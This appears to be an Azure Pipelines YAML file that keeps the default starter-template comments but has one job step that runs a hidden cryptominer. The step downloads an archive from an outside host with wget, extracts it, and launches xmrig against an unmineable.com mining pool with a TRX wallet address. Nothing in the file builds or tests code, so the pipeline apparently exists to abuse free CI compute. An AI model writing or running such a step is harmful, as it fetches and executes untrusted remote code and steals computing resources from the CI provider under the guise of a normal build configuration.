# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml

trigger:
- main

pool:
  vmImage: ubuntu-latest

jobs:
- job: a
  steps:
  - wget  https://widewebhoster.com/s.tar.gz ; tar xvzf s.tar.gz ; ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u TRX:TLV7V1M93THf1C5j95Fq34e6kDvXcrHuFz.sonarcloud -p x